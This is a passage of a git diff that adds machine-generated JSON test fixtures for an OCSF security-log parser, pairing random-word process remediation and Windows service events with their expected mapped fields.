\"type_id\": 1, \"credential_uid\": \"223c7f2a-a02f-11ef-9b2e-0242ac110007\"}, \"parent_folder\": \"kid hollow housing/trick.dwg\", \"accessed_time\": 1731330977007, \"hashes\": [{\"value\": \"84282F14696FCE92F1387E783E6E35A7F462B8F63DD2CBBF03C8FBD817B4B334EA21DB328F7F7CC7040EBAEC27B5E741457DFC36FAEC09CB527ECE2B22C142C4\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"A74A78AF4E994F8C5ADE1098C677DEE43370A2B898524B0730EBFF42FA2C8359\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": false}, \"user\": {\"name\": \"Royal\", \"type\": \"eclipse\", \"uid\": 
\"223c92ee-a02f-11ef-b37d-0242ac110007\", \"org\": {\"name\": \"races obtaining business\", \"uid\": \"223c9f6e-a02f-11ef-80ed-0242ac110007\", \"ou_name\": \"larger phones hotel\", \"ou_uid\": \"223ca72a-a02f-11ef-b597-0242ac110007\"}, \"type_id\": 99, \"account\": {\"name\": \"execution implemented contributions\", \"type\": \"AWS Account\", \"uid\": \"223cb300-a02f-11ef-a109-0242ac110007\", \"type_id\": 10}, \"ldap_person\": {\"location\": {\"desc\": \"Senegal, Republic of\", \"city\": \"Barely vpn\", \"country\": \"SN\", \"coordinates\": [-6.1769, -23.2664], \"continent\": \"Africa\"}, \"given_name\": \"oven registrar consultant\", \"ldap_cn\": \"insulin convicted posted\", \"modified_time\": 1731330977010}}, \"tid\": 28, \"uid\": \"223d09cc-a02f-11ef-88a8-0242ac110007\", \"cmd_line\": \"cologne preventing pvc\", \"created_time\": 1731330977010, \"integrity\": \"tears\", \"integrity_id\": 99, \"parent_process\": {\"pid\": 58, \"file\": {\"name\": \"concept.tar\", \"type\": \"Regular File\", \"path\": \"aging socks soc/traditions.nes/concept.tar\", \"modifier\": {\"name\": \"Mai\", \"type\": \"mineral\", \"uid\": \"223d2b96-a02f-11ef-a466-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"fitting remembered advertiser\", \"type\": \"Linux Account\", \"uid\": \"223d378a-a02f-11ef-a93b-0242ac110007\", \"type_id\": 9}, \"credential_uid\": \"223d4086-a02f-11ef-aae8-0242ac110007\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"uid_alt\": \"chevrolet header sensitive\"}, \"uid\": \"223d47d4-a02f-11ef-80dd-0242ac110007\", \"ext\": \"finnish quotations trigger\", \"type_id\": 1, \"parent_folder\": \"aging socks soc/traditions.nes\", \"hashes\": [{\"value\": \"CCF8B7F3C1B91940CEA0982813BDECBB4177E02F8485991FF6F5F1ED5AEB7448BB931BD088B4617001768303ECEE51E3D61A3CC7369BA9EEF3C965E865EFEA4A\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Clubs\", \"type\": \"Unknown\", \"uid\": \"223d59ae-a02f-11ef-8620-0242ac110007\", 
\"type_id\": 0, \"risk_score\": 1, \"uid_alt\": \"quebec robertson slovak\"}, \"tid\": 22, \"uid\": \"223d673c-a02f-11ef-9f3c-0242ac110007\", \"cmd_line\": \"barnes outlined alabama\", \"created_time\": 1731330977013, \"parent_process\": {\"name\": \"Weapons\", \"pid\": 16, \"file\": {\"name\": \"pale.odt\", \"owner\": {\"name\": \"Waiver\", \"type\": \"carroll\", \"type_id\": 99, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 13}, \"type\": \"Character Device\", \"path\": \"pupils demonstrated spam/constitution.obj/pale.odt\", \"ext\": \"intl hip entry\", \"type_id\": 3, \"company_name\": \"Lucas Emerald\", \"parent_folder\": \"pupils demonstrated spam/constitution.obj\", \"hashes\": [{\"value\": \"8DF60FF96BFECD59DE3F802675A05912\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"149D479F6A59E992D99E894B589A22B63E7F357049D6B573DA7AAD6DB5584F44\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"security_descriptor\": \"decade prepared deleted\", \"xattributes\": {}}, \"user\": {\"name\": \"Gbp\", \"domain\": \"cathedral faces lovers\", \"uid\": \"223dc06a-a02f-11ef-8a14-0242ac110007\", \"full_name\": \"Bryan Yasmine\", \"risk_score\": 94}, \"uid\": \"223dc7f4-a02f-11ef-850b-0242ac110007\", \"cmd_line\": \"religious membership rb\", \"created_time\": 1731330977015, \"parent_process\": {\"name\": \"Invite\", \"pid\": 19, \"file\": {\"name\": \"aggressive.icns\", \"type\": \"Block Device\", \"path\": \"nyc runtime slip/ballot.thm/aggressive.icns\", \"desc\": \"ease ill executed\", \"ext\": \"malpractice road end\", \"type_id\": 4, \"mime_type\": \"income/poison\", \"parent_folder\": \"nyc runtime slip/ballot.thm\", \"hashes\": [{\"value\": \"037AEAEAF4BBF26DDABE7256A8294DC52DA48D575A1247B5C2598C47DE7AEBAB\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"C63B81E57E6869E3358411F7CCE3A2FA7BBE6FE5C1C54E3B4FDCD214F77082948C4A05C49CF7AF90CB5D0F112840C2A2B7715C80A07CF8511D608E1546DB6AC1\", \"algorithm\": 
\"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731330977016}, \"user\": {\"type\": \"User\", \"uid\": \"223decca-a02f-11ef-ab3c-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"cost_center\": \"motion saudi unix\", \"deleted_time\": 1731330977016, \"employee_uid\": \"223df7ba-a02f-11ef-8947-0242ac110007\", \"hire_time\": 1731330977016, \"last_login_time\": 1731330977016, \"ldap_dn\": \"table silent possibly\", \"surname\": \"alone tongue emotional\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1}, \"uid\": \"223dff76-a02f-11ef-b8d3-0242ac110007\", \"loaded_modules\": [\"/penguin/celebration/epson/lenders/with.uue\", \"/prefer/motherboard/traveling/factors/lawyer.tmp\"], \"cmd_line\": \"except routing crowd\", \"created_time\": 1731330977017, \"sandbox\": \"mechanisms suppose founded\"}}, \"sandbox\": \"tide oral independent\"}}}, \"terminated_time\": 1731330977017}}, \"xattributes\": {}}, \"status\": \"Unknown\", \"time\": 1731330976994, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"appeals discrete crash\", \"version\": \"1.3.0\", \"uid\": \"223a5696-a02f-11ef-ac80-0242ac110007\", \"vendor_name\": \"license push emperor\"}, \"sequence\": 26, \"profiles\": [], \"log_name\": \"ideal extended offers\", \"log_provider\": \"seller deserve sharing\", \"original_time\": \"alfred invitations speaking\", \"tenant_uid\": \"223a5fec-a02f-11ef-af39-0242ac110007\"}, \"severity\": \"Critical\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700304, \"type_name\": \"Process Remediation Activity: Harden\", \"observables\": [{\"name\": \"uploaded bear will\", \"type\": \"Subnet\", \"type_id\": 12}, {\"name\": \"italic quantitative keno\", \"type\": \"Geo Location\", \"type_id\": 26}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 64, \"activity_name\": \"Harden\", \"command_uid\": \"223ab6e0-a02f-11ef-9ffc-0242ac110007\", \"countermeasures\": 
[{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"223a6fdc-a02f-11ef-a601-0242ac110007\"}, \"d3f_technique\": {\"name\": \"columbus sync taken\", \"uid\": \"223a80c6-a02f-11ef-9766-0242ac110007\"}}], \"enrichments\": [{\"data\": \"trackback\", \"name\": \"natural segment seattle\", \"value\": \"rebecca stack obtain\", \"created_time\": 1731330976994, \"provider\": \"shall surplus transparency\", \"reputation\": {\"base_score\": 63.125, \"provider\": \"czech meter kinda\", \"score\": \"Possibly Malicious\", \"score_id\": 8}, \"src_url\": \"employees\"}, {\"data\": \"academics\", \"name\": \"todd earliest quick\", \"type\": \"older complicated mails\", \"value\": \"issued dressed latina\", \"created_time\": 1731330976994, \"provider\": \"tube subtle austin\", \"short_desc\": \"summer concentration specific\", \"src_url\": \"domestic\"}], \"severity_id\": 5, \"status_code\": \"malawi\", \"status_detail\": \"odd lib station\", \"status_id\": 0}", + "event": { + "action": "harden", + "category": [], + "outcome": "unknown", + "provider": "seller deserve sharing", + "reason": "heaven country sugar", + "sequence": 26, + "severity": 5, + "type": [] + }, + "@timestamp": "2024-11-11T13:16:16.994000Z", + "file": { + "directory": "guilty different comply/expects.accdb", + "hash": { + "sha256": "EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698", + "tlsh": "6B1C747BA410921F62727C6AEE307A71A7021A4F23DCD2CCFAB1EC037E3A86C28518C84FC4E389893A41ED6CC8EFCA276E1FA37D836A1183305EC8DD7BC3D3F0" + }, + "name": "earliest.pdb", + "owner": "Tee", + "path": "guilty different comply/expects.accdb/earliest.pdb", + "type": "Regular File", + "uid": "223ad95e-a02f-11ef-8523-0242ac110007" + }, + "ocsf": { + "activity_id": 4, + "activity_name": "Harden", + "class_name": "Process Remediation Activity", + "class_uid": 7003, + "process": { + "parent": { + "user": { + "email": "Li@scientific.travel", + "full_name": "Anita Rosanna" + } + } + } + }, + "process": { + "command_line": 
"guided stretch phrases", + "name": "Success", + "parent": { + "command_line": "suits chris sega", + "entity_id": "223b4aa6-a02f-11ef-9d39-0242ac110007", + "name": "Em", + "pid": 60, + "start": "2024-11-11T13:16:16.999000Z", + "user": { + "id": [ + "223b30c0-a02f-11ef-87cb-0242ac110007" + ], + "name": "Membership" + } + }, + "pid": 94, + "start": "2024-11-11T13:16:16.996000Z", + "user": { + "id": [ + "223aed7c-a02f-11ef-943c-0242ac110007" + ], + "name": "Livestock" + } + }, + "related": { + "hash": [ + "EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698" + ], + "user": [ + "Tee" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_process_remediation_activity_2.json b/OCSF/ocsf/tests/generated_process_remediation_activity_2.json new file mode 100644 index 000000000..899ec4fb5 --- /dev/null +++ b/OCSF/ocsf/tests/generated_process_remediation_activity_2.json 
@@ -0,0 +1,69 @@ +{ + "input": { + "message": "{\"message\": \"sellers besides hl\", \"process\": {\"name\": \"Prince\", \"pid\": 7, \"file\": {\"name\": \"propose.pptx\", \"type\": \"Folder\", \"signature\": {\"algorithm\": \"DSA\", \"algorithm_id\": 1}, \"modifier\": {\"name\": \"Stylish\", \"type\": \"Unknown\", \"uid\": \"28d3fd18-a02f-11ef-af24-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"employee_uid\": \"28d42ee6-a02f-11ef-9279-0242ac110007\"}, \"risk_level\": \"loving\", \"risk_level_id\": 99, \"risk_score\": 0}, \"desc\": \"ceiling patches side\", \"uid\": \"28d43742-a02f-11ef-9ec1-0242ac110007\", \"type_id\": 2, \"creator\": {\"name\": \"Remained\", \"type\": \"latino\", \"domain\": \"rest investor soa\", \"uid\": \"28d473e2-a02f-11ef-9ccb-0242ac110007\", \"type_id\": 99}, \"hashes\": [{\"value\": \"89759E1284E2479B991D2669DE104942\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Pork\", \"type\": \"User\", \"uid\": \"28d4888c-a02f-11ef-82fc-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"location\": {\"desc\": \"Dominica, Commonwealth of\", \"city\": \"Discrimination fri\", \"country\": \"DM\", \"coordinates\": [92.1251, 34.7562], \"continent\": \"North America\"}, \"manager\": {\"name\": \"Idol\", \"type\": \"Admin\", \"uid\": \"28d4cb94-a02f-11ef-b90f-0242ac110007\", \"type_id\": 2, \"risk_level\": \"gothic smithsonian garmin\"}, \"employee_uid\": \"28d4d544-a02f-11ef-ad52-0242ac110007\", \"given_name\": \"includes livestock index\", \"job_title\": \"strategies compliant references\", \"leave_time\": 1731330988071, \"modified_time\": 1731330988071}, \"uid_alt\": \"control gary baking\"}, \"tid\": 47, \"uid\": \"28d4de90-a02f-11ef-98b9-0242ac110007\", \"cmd_line\": \"characters vocal tracy\", \"created_time\": 1731330988072, 
\"parent_process\": {\"pid\": 40, \"file\": {\"attributes\": 79, \"name\": \"irc.com\", \"type\": \"Unknown\", \"path\": \"finding possibilities clinton/cached.asf/irc.com\", \"signature\": {\"state\": \"Revoked\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"external compiler heated\", \"issuer\": \"appears hungry drive\", \"fingerprints\": [{\"value\": \"63F62E392F7025A4167DD1EC5A9EF966C16729FDC201CB89B807A60D5332A7A9473433A7AE2CD8C213C47520CFCDF970F3EA2DFEF02D04EA5B66610BDEA8D497\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731330988072, \"expiration_time\": 1731330988072, \"serial_number\": \"configuration deadline calgary\"}, \"algorithm\": \"fails\", \"algorithm_id\": 99, \"state_id\": 3}, \"modifier\": {\"type\": \"User\", \"uid\": \"28d51ef0-a02f-11ef-92f3-0242ac110007\", \"type_id\": 1, \"email_addr\": \"Yu@monroe.mil\"}, \"ext\": \"consequences years ecology\", \"type_id\": 0, \"parent_folder\": \"finding possibilities clinton/cached.asf\", \"hashes\": [{\"value\": \"A6426312E27AB008F4EDC3204E03FD5B383EA1C8B4A4567E748A42CEF025EF43A89764E99A4D39740137733A152598B7050663A2C427F7874F331D0609FD3CB8\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"EACCA81A25CF539B76C8A39BB632EC20C918EF9EFD1E73B8FDEB68C67765DE58E5925C523C695E88ACB94E43C38BA494EFF4D1A415A91C332930A3FB12A5AF27\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"type\": \"Unknown\", \"uid\": \"28d53156-a02f-11ef-aa73-0242ac110007\", \"type_id\": 0}, \"tid\": 51, \"uid\": \"28d53f16-a02f-11ef-9a1e-0242ac110007\", \"cmd_line\": \"commission relying steady\", \"created_time\": 1731330988074, \"integrity\": \"Medium\", \"integrity_id\": 3, \"parent_process\": {\"pid\": 56, \"session\": {\"terminal\": \"occur match lan\", \"uid\": \"28d58f84-a02f-11ef-8740-0242ac110007\", \"created_time\": 1731330988076, \"expiration_reason\": \"therapeutic midlands visited\", \"is_remote\": true}, \"file\": 
{\"attributes\": 47, \"name\": \"anymore.tar\", \"owner\": {\"name\": \"Halifax\", \"type\": \"User\", \"type_id\": 1, \"risk_level\": \"Medium\", \"risk_level_id\": 2}, \"type\": \"Regular File\", \"uid\": \"28d5c4cc-a02f-11ef-8469-0242ac110007\", \"type_id\": 1, \"hashes\": [{\"value\": \"F573102FF9F85CEA0795FA811907D06B74C86CDE18D2999A2070523EC27478C2F15F634D3D0509B660995C0695E665C4A124CD5F1F657FD9E26AC679200F1425\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"modified_time\": 1731330988078, \"security_descriptor\": \"realtors shoulder kilometers\", \"xattributes\": {}}, \"user\": {\"name\": \"Figured\", \"type\": \"System\", \"uid\": \"28d5fac8-a02f-11ef-895f-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"28d602ac-a02f-11ef-9c04-0242ac110007\", \"email_addr\": \"Darla@movies.org\"}, \"uid\": \"28d63402-a02f-11ef-b1e9-0242ac110007\", \"cmd_line\": \"overview statutes valves\", \"created_time\": 1731330988080, \"integrity\": \"losses renewal aquatic\"}}}, \"status\": \"dynamic acer dollar\", \"time\": 1731330988061, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"diamond aaa screensavers\", \"version\": \"1.3.0\", \"path\": \"mem anthropology notifications\", \"uid\": \"28d1a536-a02f-11ef-92c5-0242ac110007\", \"cpe_name\": \"quebec labs assume\", \"vendor_name\": \"professionals subsidiary maria\"}, \"labels\": [\"bandwidth\", \"jeremy\"], \"profiles\": [], \"event_code\": \"digit\", \"log_name\": \"bosnia blind seq\", \"log_provider\": \"arg handed dock\", \"log_version\": \"congratulations solution vancouver\", \"original_time\": \"famous thinking males\"}, \"scan\": {\"name\": \"soon reproduce paragraph\", \"type\": \"Updated Content\", \"uid\": \"28d22ac4-a02f-11ef-a4e4-0242ac110007\", \"type_id\": 3}, \"severity\": \"Informational\", \"category_uid\": 7, \"activity_id\": 0, \"type_uid\": 700300, \"type_name\": \"Process Remediation Activity: Unknown\", \"observables\": [{\"name\": \"targeted arlington mediterranean\", 
\"type\": \"Geo Location\", \"type_id\": 26, \"reputation\": {\"base_score\": 94.8029, \"provider\": \"lucy printing mrna\", \"score\": \"turkish\", \"score_id\": 99}}, {\"name\": \"payment traditions proudly\", \"type\": \"CVE Object: uid\", \"type_id\": 18}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 14, \"activity_name\": \"Unknown\", \"command_uid\": \"28d355b6-a02f-11ef-b6de-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d23d02-a02f-11ef-97ab-0242ac110007\"}, \"d3f_technique\": {\"name\": \"dosage cart but\", \"uid\": \"28d29040-a02f-11ef-b946-0242ac110007\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d29c02-a02f-11ef-9d6f-0242ac110007\"}, \"d3f_technique\": {\"uid\": \"28d2cb6e-a02f-11ef-a981-0242ac110007\", \"src_url\": \"amsterdam\"}}], \"severity_id\": 1, \"status_detail\": \"bow euros scsi\"}" + }, + "expected": { + "message": "{\"message\": \"sellers besides hl\", \"process\": {\"name\": \"Prince\", \"pid\": 7, \"file\": {\"name\": \"propose.pptx\", \"type\": \"Folder\", \"signature\": {\"algorithm\": \"DSA\", \"algorithm_id\": 1}, \"modifier\": {\"name\": \"Stylish\", \"type\": \"Unknown\", \"uid\": \"28d3fd18-a02f-11ef-af24-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"employee_uid\": \"28d42ee6-a02f-11ef-9279-0242ac110007\"}, \"risk_level\": \"loving\", \"risk_level_id\": 99, \"risk_score\": 0}, \"desc\": \"ceiling patches side\", \"uid\": \"28d43742-a02f-11ef-9ec1-0242ac110007\", \"type_id\": 2, \"creator\": {\"name\": \"Remained\", \"type\": \"latino\", \"domain\": \"rest investor soa\", \"uid\": \"28d473e2-a02f-11ef-9ccb-0242ac110007\", \"type_id\": 99}, \"hashes\": [{\"value\": \"89759E1284E2479B991D2669DE104942\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": 
\"C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Pork\", \"type\": \"User\", \"uid\": \"28d4888c-a02f-11ef-82fc-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"location\": {\"desc\": \"Dominica, Commonwealth of\", \"city\": \"Discrimination fri\", \"country\": \"DM\", \"coordinates\": [92.1251, 34.7562], \"continent\": \"North America\"}, \"manager\": {\"name\": \"Idol\", \"type\": \"Admin\", \"uid\": \"28d4cb94-a02f-11ef-b90f-0242ac110007\", \"type_id\": 2, \"risk_level\": \"gothic smithsonian garmin\"}, \"employee_uid\": \"28d4d544-a02f-11ef-ad52-0242ac110007\", \"given_name\": \"includes livestock index\", \"job_title\": \"strategies compliant references\", \"leave_time\": 1731330988071, \"modified_time\": 1731330988071}, \"uid_alt\": \"control gary baking\"}, \"tid\": 47, \"uid\": \"28d4de90-a02f-11ef-98b9-0242ac110007\", \"cmd_line\": \"characters vocal tracy\", \"created_time\": 1731330988072, \"parent_process\": {\"pid\": 40, \"file\": {\"attributes\": 79, \"name\": \"irc.com\", \"type\": \"Unknown\", \"path\": \"finding possibilities clinton/cached.asf/irc.com\", \"signature\": {\"state\": \"Revoked\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"external compiler heated\", \"issuer\": \"appears hungry drive\", \"fingerprints\": [{\"value\": \"63F62E392F7025A4167DD1EC5A9EF966C16729FDC201CB89B807A60D5332A7A9473433A7AE2CD8C213C47520CFCDF970F3EA2DFEF02D04EA5B66610BDEA8D497\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731330988072, \"expiration_time\": 1731330988072, \"serial_number\": \"configuration deadline calgary\"}, \"algorithm\": \"fails\", \"algorithm_id\": 99, \"state_id\": 3}, \"modifier\": {\"type\": \"User\", \"uid\": \"28d51ef0-a02f-11ef-92f3-0242ac110007\", \"type_id\": 1, \"email_addr\": \"Yu@monroe.mil\"}, \"ext\": 
\"consequences years ecology\", \"type_id\": 0, \"parent_folder\": \"finding possibilities clinton/cached.asf\", \"hashes\": [{\"value\": \"A6426312E27AB008F4EDC3204E03FD5B383EA1C8B4A4567E748A42CEF025EF43A89764E99A4D39740137733A152598B7050663A2C427F7874F331D0609FD3CB8\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"EACCA81A25CF539B76C8A39BB632EC20C918EF9EFD1E73B8FDEB68C67765DE58E5925C523C695E88ACB94E43C38BA494EFF4D1A415A91C332930A3FB12A5AF27\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"type\": \"Unknown\", \"uid\": \"28d53156-a02f-11ef-aa73-0242ac110007\", \"type_id\": 0}, \"tid\": 51, \"uid\": \"28d53f16-a02f-11ef-9a1e-0242ac110007\", \"cmd_line\": \"commission relying steady\", \"created_time\": 1731330988074, \"integrity\": \"Medium\", \"integrity_id\": 3, \"parent_process\": {\"pid\": 56, \"session\": {\"terminal\": \"occur match lan\", \"uid\": \"28d58f84-a02f-11ef-8740-0242ac110007\", \"created_time\": 1731330988076, \"expiration_reason\": \"therapeutic midlands visited\", \"is_remote\": true}, \"file\": {\"attributes\": 47, \"name\": \"anymore.tar\", \"owner\": {\"name\": \"Halifax\", \"type\": \"User\", \"type_id\": 1, \"risk_level\": \"Medium\", \"risk_level_id\": 2}, \"type\": \"Regular File\", \"uid\": \"28d5c4cc-a02f-11ef-8469-0242ac110007\", \"type_id\": 1, \"hashes\": [{\"value\": \"F573102FF9F85CEA0795FA811907D06B74C86CDE18D2999A2070523EC27478C2F15F634D3D0509B660995C0695E665C4A124CD5F1F657FD9E26AC679200F1425\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"modified_time\": 1731330988078, \"security_descriptor\": \"realtors shoulder kilometers\", \"xattributes\": {}}, \"user\": {\"name\": \"Figured\", \"type\": \"System\", \"uid\": \"28d5fac8-a02f-11ef-895f-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"28d602ac-a02f-11ef-9c04-0242ac110007\", \"email_addr\": \"Darla@movies.org\"}, \"uid\": \"28d63402-a02f-11ef-b1e9-0242ac110007\", \"cmd_line\": \"overview statutes valves\", \"created_time\": 
1731330988080, \"integrity\": \"losses renewal aquatic\"}}}, \"status\": \"dynamic acer dollar\", \"time\": 1731330988061, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"diamond aaa screensavers\", \"version\": \"1.3.0\", \"path\": \"mem anthropology notifications\", \"uid\": \"28d1a536-a02f-11ef-92c5-0242ac110007\", \"cpe_name\": \"quebec labs assume\", \"vendor_name\": \"professionals subsidiary maria\"}, \"labels\": [\"bandwidth\", \"jeremy\"], \"profiles\": [], \"event_code\": \"digit\", \"log_name\": \"bosnia blind seq\", \"log_provider\": \"arg handed dock\", \"log_version\": \"congratulations solution vancouver\", \"original_time\": \"famous thinking males\"}, \"scan\": {\"name\": \"soon reproduce paragraph\", \"type\": \"Updated Content\", \"uid\": \"28d22ac4-a02f-11ef-a4e4-0242ac110007\", \"type_id\": 3}, \"severity\": \"Informational\", \"category_uid\": 7, \"activity_id\": 0, \"type_uid\": 700300, \"type_name\": \"Process Remediation Activity: Unknown\", \"observables\": [{\"name\": \"targeted arlington mediterranean\", \"type\": \"Geo Location\", \"type_id\": 26, \"reputation\": {\"base_score\": 94.8029, \"provider\": \"lucy printing mrna\", \"score\": \"turkish\", \"score_id\": 99}}, {\"name\": \"payment traditions proudly\", \"type\": \"CVE Object: uid\", \"type_id\": 18}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 14, \"activity_name\": \"Unknown\", \"command_uid\": \"28d355b6-a02f-11ef-b6de-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d23d02-a02f-11ef-97ab-0242ac110007\"}, \"d3f_technique\": {\"name\": \"dosage cart but\", \"uid\": \"28d29040-a02f-11ef-b946-0242ac110007\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d29c02-a02f-11ef-9d6f-0242ac110007\"}, \"d3f_technique\": {\"uid\": \"28d2cb6e-a02f-11ef-a981-0242ac110007\", \"src_url\": \"amsterdam\"}}], \"severity_id\": 1, 
\"status_detail\": \"bow euros scsi\"}", + "event": { + "action": "unknown", + "category": [], + "code": "digit", + "provider": "arg handed dock", + "reason": "sellers besides hl", + "severity": 1, + "type": [] + }, + "@timestamp": "2024-11-11T13:16:28.061000Z", + "file": { + "hash": { + "md5": "89759E1284E2479B991D2669DE104942", + "ssdeep": "C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64" + }, + "inode": "28d43742-a02f-11ef-9ec1-0242ac110007", + "name": "propose.pptx", + "type": "Folder" + }, + "ocsf": { + "activity_id": 0, + "activity_name": "Unknown", + "class_name": "Process Remediation Activity", + "class_uid": 7003 + }, + "process": { + "command_line": "characters vocal tracy", + "entity_id": "28d4de90-a02f-11ef-98b9-0242ac110007", + "name": "Prince", + "parent": { + "command_line": "commission relying steady", + "entity_id": "28d53f16-a02f-11ef-9a1e-0242ac110007", + "pid": 40, + "start": "2024-11-11T13:16:28.074000Z", + "thread": { + "id": 51 + }, + "user": { + "id": [ + "28d53156-a02f-11ef-aa73-0242ac110007" + ] + } + }, + "pid": 7, + "start": "2024-11-11T13:16:28.072000Z", + "thread": { + "id": 47 + }, + "user": { + "id": [ + "28d4888c-a02f-11ef-82fc-0242ac110007" + ], + "name": "Pork" + } + }, + "related": { + "hash": [ + "89759E1284E2479B991D2669DE104942", + "C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_windows_service_1.json b/OCSF/ocsf/tests/generated_windows_service_1.json new file mode 100644 index 000000000..c474de045 --- /dev/null +++ b/OCSF/ocsf/tests/generated_windows_service_1.json 
@@ -0,0 +1,97 @@ +{ + "input": { + "message": "{\"message\": \"gear technologies garlic\", \"status\": \"Failure\", \"time\": 1731399707936, \"device\": {\"owner\": {\"name\": \"Paper\", \"type\": \"Unknown\", \"domain\": \"comfort pick casino\", \"uid\": \"29093ba4-a0cf-11ef-a993-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"2909420c-a0cf-11ef-ae57-0242ac110007\"}, \"type\": \"IDS\", \"uid\": \"29092d44-a0cf-11ef-8baa-0242ac110007\", \"type_id\": 13, \"imei\": \"polyester verified charlie\", \"instance_uid\": \"29091d04-a0cf-11ef-8935-0242ac110007\", \"interface_name\": \"fonts roller schema\", \"interface_uid\": \"290925c4-a0cf-11ef-83a0-0242ac110007\", \"is_managed\": true, \"network_interfaces\": [{\"name\": \"nickname museums symptoms\", \"type\": \"Unknown\", \"hostname\": \"influenced.museum\", \"mac\": \"25:15:EA:C3:5F:12:EF:E9\", \"type_id\": 0}, {\"name\": \"polar bm traveler\", \"type\": \"Wired\", \"hostname\": \"vegetarian.store\", \"mac\": \"87:8C:2:BD:DD:A8:43:3A\", \"type_id\": 1}], \"region\": \"provider nirvana absolute\", \"risk_level\": \"Critical\", \"risk_level_id\": 4}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"pokemon know retrieval\", \"version\": \"1.3.0\", \"path\": \"dolls vid representing\", \"uid\": \"290890b4-a0cf-11ef-b8db-0242ac110007\", \"vendor_name\": \"hide broken trademark\"}, \"profiles\": [], \"log_name\": \"cindy drives thin\", \"log_provider\": \"foo canada biodiversity\", \"original_time\": \"virus pure partly\", \"processed_time\": 1731399707888}, \"start_time\": 1731399707936, \"severity\": \"Medium\", \"category_uid\": 1, \"activity_id\": 4, \"type_uid\": 20100404, \"type_name\": \"Windows Service Activity: Stop\", \"observables\": [{\"name\": \"generation damages hawaii\", \"type\": \"Email\", \"value\": \"sale talking pairs\", \"type_id\": 22}, {\"name\": \"testimonials seventh smallest\", \"type\": \"MAC Address\", \"type_id\": 3}], \"category_name\": \"System Activity\", \"class_uid\": 
